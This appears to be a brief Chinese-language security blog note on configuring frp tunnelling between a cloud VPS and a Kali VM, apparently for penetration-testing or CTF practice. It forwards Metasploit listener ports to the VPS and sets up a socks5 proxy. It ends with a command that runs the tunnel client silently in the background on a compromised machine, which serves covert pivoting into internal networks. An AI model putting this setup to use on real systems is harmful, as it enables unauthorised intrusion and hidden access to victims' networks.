🗒️frp连通vps和kali虚拟机
2023-12-25
| 2024-1-20
字数 203阅读时长 1 分钟
type
Post
status
Published
date
Dec 25, 2023
slug
innet/vpsfrp
summary
记录一下frp做内网穿透的简单配置
tags
内网相关
category
网络安全
icon
password

centos 阿里云配置

dashboard_user是web面板账户
dashboard_pwd是web面板账户的密码
dashboard_port是web面板端口
token客户端和服务端保持相同,一种认证
notion image

window物理机和kali虚拟机配置(端口转发)

[common] server_addr = xxxx (云服务器公网地址) server_port = 9601 token=huanwuxie
[http] type = tcp local_ip = 127.0.0.1 local_port = 9999 remote_port = 9610
[msf6] type = tcp local_ip = 127.0.0.1 local_port = 6666 remote_port = 9606
[msf5] type = tcp local_ip = 127.0.0.1 local_port = 5555 remote_port = 9605
[msf4] type = tcp local_ip = 127.0.0.1 local_port = 4444 remote_port = 9604

socks代理的客户端配置

frps的云端配置不变
[common] server_addr = 云机器公网ip server_port = 9601 token=huanwuxie
[socks] type = tcp remote_port = 9612 plugin = socks5
 
之后的代理就是socks5 云机器公网ip 9612

被攻击机器上后台执行frp客户端

nohup ./frpc -c ./frpc.ini >/dev/null 2>&1 &
 
  • 内网相关
  • BUU-Struts2,thinphp,flask ssti,php xxe CTF刷点题
    Loading...